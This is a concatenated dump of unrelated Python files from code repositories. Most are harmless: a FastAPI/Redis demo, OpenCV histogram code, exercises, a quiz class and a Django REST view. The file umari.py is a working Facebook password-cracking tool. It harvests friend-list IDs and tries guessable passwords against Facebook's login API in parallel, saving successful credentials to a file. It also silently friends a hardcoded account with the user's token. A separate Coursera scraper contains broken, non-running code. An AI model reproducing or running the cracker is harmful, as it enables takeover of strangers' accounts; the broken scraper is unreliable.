5211a4898c1a211510a8046ed40929d34e12d441 | 867437c13bad3c10c2c2e78eeab0827b6a46c754 | /app/main.py | 3d62cd7d3f6cc56e31c2739ea35420cc57ee08f3 | [] | no_license | BoredTweak/heroku-api-redis-demo | 40e6fe34a2c884297ccc7fc4fb211eb62781e780 | fc024821467a5ba4b59821b8020437845108f3f0 | refs/heads/main | 2023-07-25T02:53:09.298035 | 2021-08-25T16:18:26 | 2021-08-25T16:18:26 | 399,864,452 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 605 | py | import threading
import redis
import sys
import time
from fastapi import FastAPI
import os
from dotenv import load_dotenv
load_dotenv()
hostAddress = os.environ.get('REDIS_URL')
port = os.environ.get('REDIS_PORT')
app = FastAPI(root_path='/api')
@app.get('/heartbeat')
def get_heartbeat():
r = redis.Redis(host=hostAddress, port=int(port))
return r.get("heartbeat")
@app.post('/heartbeat')
def set_heartbeat():
r = redis.Redis(host=hostAddress, port=int(port))
r.set("heartbeat", time.time())
return True
@app.get('/health')
def get_health():
return f'{hostAddress} - {port}'
| [
"alex.elia37@gmail.com"
] | alex.elia37@gmail.com |
a341ca2afe835fa5c459a897d33b89eeafb9f226 | 8e7421d340586a8d1d93304add04daf51506ada5 | /image_beautify/image_histogram_equalization.py | 26e976a007184c7c29e401198ffed20170f226d0 | [] | no_license | wddzz/opencv_and_tensorflow_study | a419d5d951be1ba52cbdbc3aafafb93092e643f1 | f89639af5268df00899601fa0e525afa0b63a713 | refs/heads/master | 2020-03-22T16:01:34.602285 | 2018-08-01T15:57:18 | 2018-08-01T15:57:18 | 140,297,326 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 791 | py | import cv2
import numpy as np
img0 = cv2.imread("H:\\Files\\image_process\\damimi.jpg",1)
# 灰度 直方图均衡化
# gray = cv2.cvtColor(img0,cv2.COLOR_BGR2GRAY)
# dst = cv2.equalizeHist(gray)
# 彩色 直方图均衡化
# (b,g,r) = cv2.split(img0)
# bdst = cv2.equalizeHist(b)
# gdst = cv2.equalizeHist(g)
# rdst = cv2.equalizeHist(r)
# dst = cv2.merge((bdst,gdst,rdst))#通道的合成
# YUV 均衡化
imgYUV = cv2.cvtColor(img0,cv2.COLOR_BGR2YCrCb)
channalYUV = cv2.split(imgYUV)
channalYUV[0] = cv2.equalizeHist(channalYUV[0])
channals = cv2.merge(channalYUV)
dst = cv2.cvtColor(channals,cv2.COLOR_YCrCb2BGR)
cv2.namedWindow("src",0)
cv2.resizeWindow("src",240,480)
cv2.imshow("src",img0)
cv2.namedWindow("dst",0)
cv2.resizeWindow("dst",240,480)
cv2.imshow("dst",dst)
cv2.waitKey(0) | [
"406452653@qq.com"
] | 406452653@qq.com |
2eef82d1bf14b03fe93199ebb554bad4dae8ae0a | ec3f9f1b1327ec8a69bd2fc056cdb2dbf7c243d3 | /week_1/Solution_4.py | 7651516d57b86a5b26049840c54e0379842a2db2 | [] | no_license | WhiteFeniks/Python_Cursera | e5d7e04c40eb586a9763f38de55c88cfb77318a4 | 0dbb85f0a225e7152599bbea75e1637d8f4dd04c | refs/heads/master | 2022-11-15T22:39:35.663524 | 2020-07-11T16:55:39 | 2020-07-11T16:55:39 | 278,734,455 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32 | py | n = int(input())
print (2**n)
| [
"macbookair@White-Fang-Mac.local"
] | macbookair@White-Fang-Mac.local |
fdfd405481a69ee32d75908d3217785d365d90a4 | f6fafb196e9e68e3f849ec4dfa4046632380c822 | /100 days of code/day 17/quiz_brain.py | 450561a3478070d271164a21cc5acb2a8888923b | [] | no_license | Juozapaitis/100daysOfCodeUdemy | 77f0f2c658952e6bed5d776ff135233d96328471 | 4de48a778ea438f5c36f6d9638c3c01a7d7437ff | refs/heads/master | 2023-09-02T04:53:47.604007 | 2021-10-20T08:42:04 | 2021-10-20T09:30:00 | 419,249,733 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 941 | py | class QuizBrain():
def __init__(self, questions_list):
self.question_number = 0
self.score = 0
self.questions_list = questions_list
def next_question(self):
current_question = self.questions_list[self.question_number]
self.question_number += 1
user_answer = input(f"Q.{self.question_number}: {current_question.text} (True/False): ")
self.check_answer(user_answer, current_question.answer)
def still_has_questions(self):
return self.question_number < len(self.questions_list)
def check_answer(self, user_answer, correct_answer):
if user_answer.lower() == correct_answer.lower():
print("You got it right!")
self.score += 1
else:
print("That's wrong.")
print(f"The correct answer was: {correct_answer}.")
print(f"Your current score is: {self.score}/{self.question_number}")
print("") | [
"justasjuozapaitis65@gmail.com"
] | justasjuozapaitis65@gmail.com |
618d26a1de085c3b232b50f8a719c096a1a4c389 | b5ca0a2ce47fdb4306bbdffcb995eb7e6eac1b23 | /Python/Regex and Parsing/Validating phone numbers/attempt2.py | 2b2d832379b0eb3a6171a2ff4bfd378358e9b641 | [] | no_license | rsoemardja/HackerRank | ac257a66c3649534197b223b8ab55011d84fb9e1 | 97d28d648a85a16fbe6a5d6ae72ff6503a063ffc | refs/heads/master | 2022-04-14T22:46:03.412359 | 2020-04-03T07:44:04 | 2020-04-03T07:44:04 | 217,687,370 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 149 | py | import re
n = int(input())
for _ in range(n):
if re.fullmatch('[789]\d{9}', input()) != None:
print('YES')
else:
print('NO') | [
"rsoemardja@gmail.com"
] | rsoemardja@gmail.com |
7cc0f99a45c4afebcd51d2a614f223eba92ad6fd | e2561aaf3fec80646c0c44fa369d062865bd8f39 | /backend/tests/views.py | eced51ac47ebd25216bd2576375aff6912fed3bf | [] | no_license | prakritimaddheshiya/tests | b4fb2ba91f7d51d6f4c5dd2da0a8a38c3ff8fd29 | 91cffb07fa0ab674b0e49e11b6f8d5c39159357e | refs/heads/main | 2023-04-20T15:59:08.619385 | 2021-05-17T11:26:57 | 2021-05-17T11:26:57 | 368,150,110 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 968 | py | from rest_framework import status
from rest_framework.response import Response
from rest_framework.views import APIView
from .models import Tests
from .serializers import TestsSerializer
class TestsCreateView(APIView):
def post(self, request):
serializer = TestsSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data, status=status.HTTP_200_OK)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class TestsListView(APIView):
def get(self, request):
tests = Tests.objects.all()
serializer = TestsSerializer(tests, many=True)
return Response(serializer.data, status=status.HTTP_200_OK)
class TestsDetailView(APIView):
def get(self, request, test_id):
test = Tests.objects.get(id=test_id)
serializer = TestsSerializer(test)
return Response(serializer.data, status=status.HTTP_200_OK)
| [
"ayushgupta0010@gmail.com"
] | ayushgupta0010@gmail.com |
d8d5fb0ee104918f31eeef19697fffe2a9eb2015 | 9e5c864130ba4f9ae257ba0709cda1263f7b402a | /teststr.py | 0a54138cc9d82da409060d28364758c3a99d0adb | [] | no_license | LBJ-Max/basepython | ee7ce77247f92de009b0724d2656d3ddbd085130 | b7c2ee2af628125584372371389598fe81708468 | refs/heads/master | 2020-06-25T11:27:40.459374 | 2019-07-28T14:21:56 | 2019-07-28T14:21:56 | 199,296,609 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 214 | py | hello_str = "hello world"
# 1.统计字符串长度
print(len(hello_str))
# 2.统计字符串出现次数
times = hello_str.count("l")
print(times)
# 3.某个字符串出现的位置
print(hello_str.index("llo")) | [
"fenggaopan@dangdang.com"
] | fenggaopan@dangdang.com |
565f68b1cd1ccd748262cc61ea4bcdfe3a049ade | 42362ce3f8da59b0ba70a844243d1323221c084c | /umari.py | 4229ba2d347f356b60df256af1f114bf5cd8e5a6 | [] | no_license | Umaritfs/fb | 3c741099ca013b28775f0078459ed45454c353da | c69dbbc930106cbfe1d5625b247831a77a14dc9c | refs/heads/master | 2022-04-24T12:14:33.531320 | 2020-04-30T09:08:06 | 2020-04-30T09:08:06 | 260,159,938 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,013 | py | #!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
##### LOGO #####
logo = """
██╗░░░██╗███╗░░░███╗░█████╗░██████╗░██╗
██║░░░██║████╗░████║██╔══██╗██╔══██╗██║
██║░░░██║██╔████╔██║███████║██████╔╝██║
██║░░░██║██║╚██╔╝██║██╔══██║██╔══██╗██║
╚██████╔╝██║░╚═╝░██║██║░░██║██║░░██║██║
░╚═════╝░╚═╝░░░░░╚═╝╚═╝░░╚═╝╚═╝░░╚═╝╚═╝
\033[1;91m=======================================
\033[1;96mAuthor \033[1;93m: \033[1;92mR Bilal Kohati
\033[1;96mInstagram \033[1;93m: \033[1;mR Usman Koko
\033[1;96mFacebook \033[1;93m: \033[1; mR Nabi Tanha
\033[1;96mGithub \033[1;93m: \033[1;92mhttps://github.com/umari/fb
\033[1;91m======================================="""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[●] \x1b[1;93mSedang masuk \x1b[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print "\033[1;96m ============================================================="
print """\033[1;91m=======================================
\033[1;96mAuthor \033[1;93m: \033[1;92mR Bilal Wafa
\033[1;96mInstagram \033[1;93m: \033[1;92mR Usman koko
\033[1;96mFacebook \033[1;93m: \033[1;92mR Nabi tanha
\033[1;96mGithub \033[1;93m: \033[1;92mhttps://Github.com/Umari/fb
\033[1;91m======================================="""
print " \x1b[1;93m============================================================="
CorrectUsername = "umari"
CorrectPassword = "fb"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;96m[☆] \x1b[1;93mUsername Of Tool \x1b[1;96m>>>> ")
if (username == CorrectUsername):
password = raw_input("\033[1;96m[☆] \x1b[1;93mPassword Of Tool \x1b[1;96m>>>> ")
if (password == CorrectPassword):
print "Logged in successfully as " + username
loop = 'false'
else:
print "Wrong Password"
os.system('xdg-open https://www.Youtube.com/UCsdJQbRf0xpvwaDu1rqgJuA')
else:
print "Wrong Username"
os.system('xdg-open https://www.Youtube.com/UCsdJQbRf0xpvwaDu1rqgJuA')
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 42*"\033[1;96m="
print('\033[1;96m[☆] \x1b[1;93mLOGIN WITH FACEBOOK \x1b[1;96m[☆]' )
id = raw_input('\033[1;96m[+] \x1b[1;93mID/Email \x1b[1;91m: \x1b[1;92m')
pwd = raw_input('\033[1;96m[+] \x1b[1;93mPassword \x1b[1;91m: \x1b[1;92m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\033[1;96m[✓] \x1b[1;92mLogin Successful'
os.system('xdg-open https://www.Facebook.com/Omi6t')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
if 'checkpoint' in url:
print("\n\033[1;96m[!] \x1b[1;91mIt seems that your account has a checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;96m[!] \x1b[1;91mPassword/Email is wrong")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mIt seems that your account has a checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
os.system("clear")
print logo
print 42*"\033[1;96m="
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m Name \033[1;91m: \033[1;92m"+nama+"\033[1;97m "
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m ID \033[1;91m: \033[1;92m"+id+"\x1b[1;97m "
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Start Hacking"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Exit "
pilih()
def pilih():
unikers = raw_input("\n\033[1;97m >>> \033[1;97m")
if unikers =="":
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih()
elif unikers =="1":
super()
elif unikers =="0":
jalan('Token Removed')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Crack From Friend List"
print "\x1b[1;96m[\x1b[1;92m2\x1b[1;96m]\x1b[1;93m Crack From Any Public ID"
print "\x1b[1;96m[\x1b[1;92m3\x1b[1;96m]\x1b[1;93m Crack From File"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Back"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;97m >>> \033[1;97m")
if peak =="":
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print 42*"\033[1;96m="
jalan('\033[1;96m[✺] \033[1;93mGetting ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mEnter ID \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mName\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mID Not Found!"
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mGetting IDs \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
idlist = raw_input('\x1b[1;96m[+] \x1b[1;93mEnter File Path \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mFile Not Found'
raw_input('\n\x1b[1;96m[ \x1b[1;97mBack \x1b[1;96m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih_super()
print "\033[1;96m[+] \033[1;93mTotal IDs \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;96m[✺] \033[1;93mStarting \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;93mCracking \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print('\x1b[1;96m[!] \x1b[1;93mTo Stop Process Press CTRL Then Press z')
print 42*"\033[1;96m="
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = ('786786')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['first_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = 'Pakistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = b['first_name'] + '12'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = b['first_name'] + '1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = b['first_name'] + '1122'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mProcess Has Been Completed \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;96m[+] \033[1;92mCP File Has Been Saved \033[1;91m: \033[1;97mout/checkpoint.txt")
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
menu()
if __name__ == '__main__':
login()
| [
"noreply@github.com"
] | noreply@github.com |
24ec79d14b8a83f2c499760bc56922b02185906e | 43f299b826dc0289108e3852f3c8d92ba47677b4 | /coursera_download_files.py | fb6a14746a13590d6abff3a7b396f612b4d70dc2 | [] | no_license | bertothunder/tools | daaeeeb2243ea0819c8f5b1d9ce622564a15f239 | 207b37edf4a0d9d953f36e248591ea889c8fcd46 | refs/heads/master | 2021-01-01T06:54:24.191178 | 2014-11-27T18:02:23 | 2014-11-27T18:02:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,997 | py |
#! /usr/bin/env python2.7
'Download all the class files to a local directory'
import os, re, dumbdbm, time, gzip, cStringIO, threading, sys, argparse
from collections import namedtuple
from multiprocessing.pool import ThreadPool as Pool
from pprint import pprint
# Web scrapping modules
import mechanize, cookielib
from BeautifulSoup import BeautifulSoup
Response = namedtuple('Response', ['code', 'msg', 'compressed', 'written'])
dirname = 'files'
def urlretrieve(url, filename, cache={}, lock=threading.Lock()):
'Read contents of an open url, use etags and decompress if needed'
request = urllib2.Request(url)
#request.add_header('Cache-Control', 'no-cache')
# Not expecting compressed files
#request.add_header('Accept-Encoding', 'gzip')
with lock:
if ('etag ' + url) in cache:
request.add_header('If-None-Match', cache['etag ' + url])
if ('mod ' + url) in cache:
request.add_header('If-Modified-Since', cache['mod ' + url])
try:
u = urllib2.urlopen(request)
except urllib2.HTTPError as e:
return Response(e.code, e.msg, False, False)
content = u.read()
u.close()
compressed = u.info().getheader('Content-Encoding') == 'gzip'
#if compressed:
# content = gzip.GzipFile(fileobj=cStringIO.StringIO(content), mode='rb').read()
#else:
soup = BeautifulSoup(content)
# Let's take HTML out! soup.body(text=True) returns this as a list of **unicode**
content = str(''.join(soup.body(text=True)))
written = writefile(filename, content)
with lock:
etag = u.info().getheader('Etag')
if etag:
cache['etag ' + url] = etag
timestamp = u.info().getheader('Last-Modified')
if timestamp:
cache['mod ' + url] = timestamp
return Response(u.code, u.msg, compressed, written)
def writefile(filename, content):
"Only write content if it is not already written."
try:
with open(filename, 'rb') as f:
curr_content = f.read()
if curr_content == content:
return False
except IOError:
pass
with open(filename, 'wb') as f:
f.write(content)
return True
def download(target, dirname=dirname):
'Retrieve a target url, save it as given filename and return the download status as a string'
url, filename = target[0], target[1] if len(target) > 1 else target[0].split('/')[-1]
filename = filename.rsplit('/', 1)[-1]
fullname = os.path.join(dirname, filename)
r = urlretrieve(url, fullname, etags)
if r.code != 200:
return '%3d %-16s %s --> %s' % (r.code, r.msg, url, fullname)
written = '(updated)' if r.written else '(current)'
return '%3d%1s %-16s %-55s --> %-25s -> %s' % \
(r.code, r.compressed, r.msg, url, fullname, fullname)
def parseCmdlineOptions():
options = argparse.Options()
# Option parsing from command line will be performed later
return options
def login(browser):
br.set_handle_robots(False)
# Set cookie container
cj = cookielib.CookieJar()
br.set_cookiejar(cj)
# Allow refresh of the content
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
# Set the fake user-agent and rest of headers to emulate the browser
br.addheaders = [('User-agent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11'),
('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'),
('Accept-Encoding', 'gzip,deflate,sdch'),
('Accept-Language', 'en-US,en;q=0.8'),
('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.3'),
]
logger = logging.getLogger("mechanize")
logger.addHandler(logging.StreamHandler(sys.stdout))
logger.setLevel(logging.DEBUG)
# Set the login url for coursera, the final url for the lectures is enclosed within the url here.
br.open('https://accounts.coursera.org/signin?course_id=973439&r=https%3A%2F%2Fclass.coursera.org%2Fprogfun-005%2Flecture&user_action=class&topic_name=Functional%20Programming%20Principles%20in%20Scala')
soup = BeautifulSoup(response.get_data())
# Look for the right parts in the login form and fill them. Click in the button
soup.select("signin-email").string("my-username")
soup.select("signin-password").string("my-password")
soup.select("btn bt-success coursera-signin-button").
if __name__ == '__main__':
try:
os.mkdir(dirname)
except OSError:
pass
coursera_course_url = 'https://class.coursera.org/progfun-005/lecture'
# Set up mechanize to perform login and handle redirection to the download area.
br = mechanize.Browser()
if login(br):
pass
etags = dumbdbm.open(os.path.join(dirname, 'etag_db'))
try:
content = urllib2.urlopen(files_url)
content_html = content.read()
print (' Index page downloaded, parsing files to download').center(117, '=')
soup = BeautifulSoup(content_html)
targets = []
for link in soup.findAll('a'):
parts = content.geturl().split('/')
# parts will be 'http:','','whatever','whatever','whatever','index.html'
parts.pop(1)
parts[0] = 'http:/'
parts.pop(-1)
parts.append(link.get('href'))
# parts from BeautifulSoup are unicode, but key searching above will be string
fullurl = str('/'.join(parts))
targets.append([fullurl, link.text])
print (' Starting download at %s ' % time.ctime()).center(117)
mapper = Pool(25).imap if sys.version_info < (2, 7) else Pool(25).imap_unordered
for line in mapper(download, targets):
print line
finally:
etags.close()
| [
"acurrope@cisco.com"
] | acurrope@cisco.com |
